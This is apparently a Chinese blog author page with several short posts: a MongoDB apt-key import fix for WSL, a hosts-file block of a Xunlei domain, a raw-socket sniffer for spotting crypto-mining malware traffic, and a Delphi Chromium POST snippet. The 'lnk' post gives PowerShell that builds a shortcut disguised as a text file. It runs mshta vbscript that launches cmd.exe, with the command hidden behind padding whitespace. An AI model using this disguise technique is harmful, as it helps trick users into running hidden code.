小坏 发布的文章

WSL Ubuntu 安装MongoDb 4.0导入公钥时遇到一个坑

源中默认是MongoDb 3.x

但是我想用4.0,然后按照mongodb官方的docs进行第一步操作导入公钥

sudo apt-key adv --keyserver hkp://keyserver.ubuntu.com:80 --recv 9DA31620334BD75D9DCB49F368818C72E52529D4

结果出现下面错误

gpg: connecting dirmngr at '/tmp/apt-key-gpghome.OoGLcR7JCb/S.dirmngr' failed: IPC connect call failed
gpg: keyserver receive failed: No dirmngr


解决方法:

浏览器打开(在Ubuntu的key服务器上搜索mongodb 4.0)

http://keyserver.ubuntu.com/pks/lookup?search=mongodb%204.0&op=vindex

搜索结果

pub  4096R/E52529D4 2018-04-18            

uid MongoDB 4.0 Release Signing Key <packaging@mongodb.com>sig  sig3  E52529D4 2018-04-18 __________ 2023-04-17 [selfsig]

点击   E52529D4  的查看公钥详情,在详情页最顶一行大字!


Public Key Server -- Get "0x68818c72e52529d4 "

复制下 0x68818c72e52529d4 这串字符串然后执行命令进行导入

curl -sL "http://keyserver.ubuntu.com/pks/lookup?op=get&search=0x68818c72e52529d4" | sudo apt-key add

导入成功后返回 Ok 字样

再执行apt-get update 更新一下缓存

更新完成后 apt-get install -y mongodb-org

即可完成安装



其他软件导入公钥时遇到 IPC connect call failed 时同样可以使用该方法进行导入

lnk的一个玩法。

$Shell = New-Object -ComObject WScript.Shell
$Dir = Split-Path -Parent $MyInvocation.MyCommand.Definition
$Shortcut = $Shell.CreateShortcut("$Dir\test.txt.lnk")
$Shortcut.TargetPath = "%Windir%\System32\mshta.exe"
$Shortcut.IconLocation = "shell32.dll,70"
$Shortcut.Arguments ='                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                               vbscript:CreateObject("WScript.Shell").Run("cmd.exe",5)(window.close)'

$Shortcut.Save()



保存为.ps1然后用PowerShell运行

生成一个test.lnk 图标样式为txt

迅雷下载文件提示任务包含违规内容的解决方法

以管理员权限打开CMD 或者Power Shell输入下面命令并回车运行即可

Echo 0.0.0.0 hub5idx.shub.sandai.net>>%Windir%\System32\drivers\etc\hosts

通过屏蔽 hub5idx.shub.sandai.net这个域名既可

如果有权限登陆路由器一类的话可以直接在路由器或相关设备中屏蔽掉

一劳永逸



利用SIO_RCVALL捕获数据来简单查找挖矿木马

只做简单得技术研究,不保证百分百好用。

WSAStartup(MAKEWORD(2, 2), &wsa);
hSniffer = socket(AF_INET, SOCK_RAW, IPPROTO_IP);

LocalAddr.sin_family = AF_INET;
LocalAddr.sin_port = 0;
LocalAddr.sin_addr.s_addr = INADDR_NONE;
bind(hSniffer, (struct sockaddr *)&LocalAddr, sizeof(sockaddr_in));
//初始化并绑定Socket举报到本机IP

DWORD sioarg = 1;
DWORD dwValue = 0;
WSAIoctl(hSniffer, SIO_RCVALL, &sioarg, sizeof(DWORD), 0, 0, (LPDWORD)&dwValue, 0, 0);
//使用SIO_RCVALL命令开始捕获

char *Buffer = (char *)malloc(65536);
IPV4_HDR *IPHeader;
TCP_HDR *TCPHeader;
char *lpszStr;

recvfrom(hSniffer, Buffer, 65536, 0, 0, 0);
IPHeader = (IPV4_HDR *)Buffer;
if (IPHeader->ip_protocol == 6) { //判断是否是TCP协议
    TCPHeader = (TCP_HDR*)(Buffer + IPHeader->ip_header_len * 4); //计算偏移定位TCP头
    lpszStr = (char *)(TCPHeader + iLen + TCPHeader->data_offset * 4); //计算数据包得偏移地址
}

//lpszStr 即为TCP数据包得内容

然后挖矿程序得数据包一般为以下格式(注:不保证完全):

{"jsonrpc":"2.0","method":"job","params":{"blob":"01009580fdd4055331f01c7f3a7c15f1d88ae82f82a862e88f854856bc05758100696a96c7475300000000522ab3a142b4935c04121364c53b36266999330985c21c61f234ffd0cdcbbe1e01","job_id":"771459633298218","target":"d8a30200"}}


{"id":3396,"jsonrpc":"2.0","method":"submit","params":{"id":"399161462602205","job_id":"794963340135291","nonce":"74a999d9","result":"13e887bf1e58ad20337f8da518d7abebcc449d754db036bbcfbe4ac9ca0a0000"}}


{"method": "submit", "params": {"id": "341404656460508", "job_id": "771459633298218", "nonce": "ef430500", "result": "4290fef7f43c544c2baebeaa6ce1a459f29cb03afef69517f33acf64237d0200"}, "id":4}


{"id":4,"jsonrpc":"2.0","error":null,"result":{"status":"OK"}}


通过提取关键字来与捕获得TCP数据包内容进行匹配,当数据包中存在以上固定特征后,可通过IPV4头以及TCP协议头中的IP地址字段及端口字段在GetExtendedTcpTable获取到得TCP链接状态链表中查找,pTcpTable->table[?].dwOwningPid 即为相关进程得PID。



另外如果是挖矿程序作者原版得程序一般都会有命令行参数或者在EXE同目录存在config.json文件,我们也可以通过获取进程命令行参数来加以判断。

Chromium Post

var
  Header: ICefStringMultimap;
  Data: ICefPostData;
  Request: ICefRequest;begin
  Request := TCefRequestRef.New;
  Request.Url := 'http://example.com/';
  Request.Method := 'POST';
  Request.Flags := WUR_FLAG_NONE;

  Header := TCefStringMultimapOwn.Create;
  Header.Append('Content-Type', 'application/x-www-form-urlencoded');
  Request.SetHeaderMap(Header);

  Data := TCefPostDataRef.New;
  Data.AddElement(CreateField('Data.id=27'));
  Data.AddElement(CreateField('&Data.title=title'));
  Data.AddElement(CreateField('&Data.body=body'));
  Request.PostData := Data;

  Chromium1.Browser.MainFrame.LoadRequest(Request);end;